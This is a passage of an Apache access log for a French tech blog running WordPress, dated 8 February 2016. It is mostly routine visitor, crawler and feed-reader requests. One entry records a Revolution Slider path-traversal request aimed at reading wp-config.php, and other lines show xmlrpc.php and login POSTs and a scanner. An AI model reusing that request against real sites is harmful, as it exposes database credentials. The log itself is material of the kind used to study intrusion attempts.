\"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n90.63.244.202 - - [08/Feb/2016:07:08:04 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n90.63.244.202 - - [08/Feb/2016:07:08:04 -0800] \"GET /wp-content/uploads/2015/01/tumblr_inline_niqsunAsTl1spe2e1-50x50.jpg HTTP/1.1\" 200 2747 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n37.74.212.178 - - [08/Feb/2016:07:09:40 -0800] \"GET /creer-sa-startup-seul-et-la-revendre-a-un-geant/ HTTP/1.1\" 200 10006 \"https://www.google.nl/\" \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\"\n37.74.212.178 - - [08/Feb/2016:07:09:41 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\"\n37.74.212.178 - - [08/Feb/2016:07:09:41 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\"\n37.74.212.178 - - [08/Feb/2016:07:09:41 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\"\n37.74.212.178 - - [08/Feb/2016:07:09:41 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\"\n37.74.212.178 - - [08/Feb/2016:07:09:41 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\"\n37.74.212.178 - - [08/Feb/2016:07:09:42 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/creer-sa-startup-seul-et-la-revendre-a-un-geant/\" \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\"\n176.146.36.48 - - [08/Feb/2016:07:12:34 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.1\" 200 34314 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n176.146.36.48 - - [08/Feb/2016:07:12:34 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97500 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n62.102.228.73 - - [08/Feb/2016:07:15:45 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n62.102.228.73 - - [08/Feb/2016:07:15:45 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n62.102.228.73 - - [08/Feb/2016:07:15:45 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n62.102.228.73 - - [08/Feb/2016:07:15:45 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n62.102.228.73 - - [08/Feb/2016:07:15:45 -0800] \"GET /wp-content/uploads/2014/04/tumblr_inline_n46um7CkZE1sa6hof-50x50.jpg HTTP/1.1\" 200 2424 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n62.102.228.73 - - [08/Feb/2016:07:15:45 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n62.102.228.73 - - [08/Feb/2016:07:15:45 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n80.13.10.184 - - [08/Feb/2016:07:18:22 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [08/Feb/2016:07:18:33 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [08/Feb/2016:07:18:54 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n198.58.103.160 - - [08/Feb/2016:07:20:02 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n193.22.107.6 - - [08/Feb/2016:07:20:55 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 200 190496 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n128.232.110.28 - - [08/Feb/2016:07:22:47 -0800] \"GET / HTTP/1.1\" 200 33373 \"-\" \"Mozilla/5.0 zgrab/0.x\"\n82.237.33.174 - - [08/Feb/2016:07:24:32 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.1.56 CFNetwork/760.0.5 Darwin/15.0.0 (x86_64)\"\n82.237.33.174 - - [08/Feb/2016:07:24:44 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la-silicon HTTP/1.1\" 404 4871 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B410 Safari/600.1.4\"\n198.58.102.49 - - [08/Feb/2016:07:28:09 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n193.164.197.233 - - [08/Feb/2016:07:34:16 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n193.164.197.233 - - [08/Feb/2016:07:34:28 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n2.1.72.179 - - [08/Feb/2016:07:36:14 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n134.249.65.86 - - [08/Feb/2016:07:42:27 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29524 \"http://akvamaster.dp.ua/\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)\"\n62.210.188.62 - - [08/Feb/2016:07:42:40 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97501 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A406 Safari/8536.25\"\n62.210.188.62 - - [08/Feb/2016:07:42:41 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 200 203835 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A406 Safari/8536.25\"\n62.210.141.46 - - [08/Feb/2016:07:45:26 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97501 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A406 Safari/8536.25\"\n62.210.141.46 - - [08/Feb/2016:07:45:26 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 200 203836 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A406 Safari/8536.25\"\n173.244.168.218 - - [08/Feb/2016:07:46:55 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"-\" \"Java/1.7.0_10\"\n54.93.47.160 - - [08/Feb/2016:07:47:45 -0800] \"POST /wp-login.php HTTP/1.1\" 200 1903 \"https://duckduckgo.com/html+techmeup.co\" \"Mozilla/5.0 (Windows NT 6.0; WOW64; rv:28.0) techmeup.co/20100101 Firefox/28.0\"\n54.158.4.90 - - [08/Feb/2016:07:53:02 -0800] \"GET /techmeup-le-monde-merveilleux-de-la-tech/ HTTP/1.1\" 200 9519 \"-\" \"Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)\"\n37.97.107.89 - - [08/Feb/2016:07:54:05 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (X11; CrOS x86_64 7647.73.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.92 Safari/537.36\"\n37.97.107.89 - - [08/Feb/2016:07:54:05 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (X11; CrOS x86_64 7647.73.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.92 Safari/537.36\"\n37.97.107.89 - - [08/Feb/2016:07:54:05 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (X11; CrOS x86_64 7647.73.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.92 Safari/537.36\"\n37.97.107.89 - - [08/Feb/2016:07:54:05 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 200 1101 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (X11; CrOS x86_64 7647.73.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.92 Safari/537.36\"\n37.97.107.89 - - [08/Feb/2016:07:54:05 -0800] \"GET /wp-content/uploads/2014/12/tumblr_inline_nga5swbqRY1sygmpd-50x50.jpg HTTP/1.1\" 200 1983 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (X11; CrOS x86_64 7647.73.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.92 Safari/537.36\"\n37.97.107.89 - - [08/Feb/2016:07:54:05 -0800] \"GET /wp-content/uploads/2014/09/logo-transparent-horizontal-1024x482.png HTTP/1.1\" 200 334990 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (X11; CrOS x86_64 7647.73.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.92 Safari/537.36\"\n37.97.107.89 - - [08/Feb/2016:07:54:11 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 987 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (X11; CrOS x86_64 7647.73.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.92 Safari/537.36\"\n66.249.64.138 - - [08/Feb/2016:07:55:20 -0800] \"GET /je-viens-chercher-mon-stage-dans-la-silicon-valley/ HTTP/1.1\" 200 11343 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n198.58.102.49 - - [08/Feb/2016:07:59:41 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n92.222.20.166 - - [08/Feb/2016:08:08:15 -0800] \"GET /rss HTTP/1.1\" 304 163 \"-\" \"Tiny Tiny RSS/16.1 (c352248) (http://tt-rss.org/)\"\n186.202.127.163 - - [08/Feb/2016:08:11:06 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 629 \"-\" \"-\"\n173.236.198.102 - - [08/Feb/2016:08:19:15 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 629 \"-\" \"-\"\n198.58.103.102 - - [08/Feb/2016:08:26:08 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n196.217.79.189 - - [08/Feb/2016:08:34:00 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97501 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n196.217.79.189 - - [08/Feb/2016:08:34:01 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 200 203835 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n217.171.23.166 - - [08/Feb/2016:08:37:11 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6228 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n217.171.23.166 - - [08/Feb/2016:08:37:11 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n217.171.23.166 - - [08/Feb/2016:08:37:12 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n217.171.23.166 - - [08/Feb/2016:08:37:13 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n217.171.23.166 - - [08/Feb/2016:08:37:14 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n217.171.23.166 - - [08/Feb/2016:08:37:14 -0800] \"GET /wp-content/uploads/2014/04/tumblr_inline_n4pj44K9XI1sa6hof-50x50.jpg HTTP/1.1\" 200 2400 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n217.171.23.166 - - [08/Feb/2016:08:37:20 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/?cf_action=sync_comments&post_id=30 HTTP/1.1\" 200 308 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n80.13.10.184 - - [08/Feb/2016:08:39:19 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [08/Feb/2016:08:39:41 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n206.214.0.122 - - [08/Feb/2016:08:40:08 -0800] \"GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1\" 200 504 \"-\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"\n193.54.67.93 - - [08/Feb/2016:08:41:20 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3601 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.54.67.93 - - [08/Feb/2016:08:41:21 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.54.67.93 - - [08/Feb/2016:08:41:21 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.54.67.93 - - [08/Feb/2016:08:41:21 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 200 1101 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.54.67.93 - - [08/Feb/2016:08:41:21 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n193.54.67.93 - - [08/Feb/2016:08:41:21 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n176.128.106.15 - - [08/Feb/2016:08:44:34 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n176.128.106.15 - - [08/Feb/2016:08:44:34 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n176.128.106.15 - - [08/Feb/2016:08:44:34 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n176.128.106.15 - - [08/Feb/2016:08:44:34 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n176.128.106.15 - - [08/Feb/2016:08:44:34 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n176.128.106.15 - - [08/Feb/2016:08:44:34 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n142.137.49.90 - - [08/Feb/2016:08:46:01 -0800] \"GET /wp-content/uploads/2014/05/tumblr_inline_n59mnuUm3H1sygmpd-50x50.jpg HTTP/1.1\" 200 2463 \"http://techmeup.co/pierre-olivier-pod-dybman-le-tech-francais-de/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n162.243.175.218 - - [08/Feb/2016:08:50:24 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n176.128.106.15 - - [08/Feb/2016:08:50:25 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n176.128.106.15 - - [08/Feb/2016:08:50:37 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n87.91.108.37 - - [08/Feb/2016:08:59:47 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7663 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n87.91.108.37 - - [08/Feb/2016:08:59:47 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n87.91.108.37 - - [08/Feb/2016:08:59:47 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n87.91.108.37 - - [08/Feb/2016:08:59:47 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n87.91.108.37 - - [08/Feb/2016:08:59:48 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174730 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n87.91.108.37 - - [08/Feb/2016:08:59:48 -0800] \"GET /wp-content/uploads/2014/05/tumblr_inline_n636u5g0bD1sygmpd-50x50.jpg HTTP/1.1\" 200 2371 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n87.91.108.37 - - [08/Feb/2016:08:59:49 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n87.91.108.37 - - [08/Feb/2016:08:59:55 -0800] \"GET 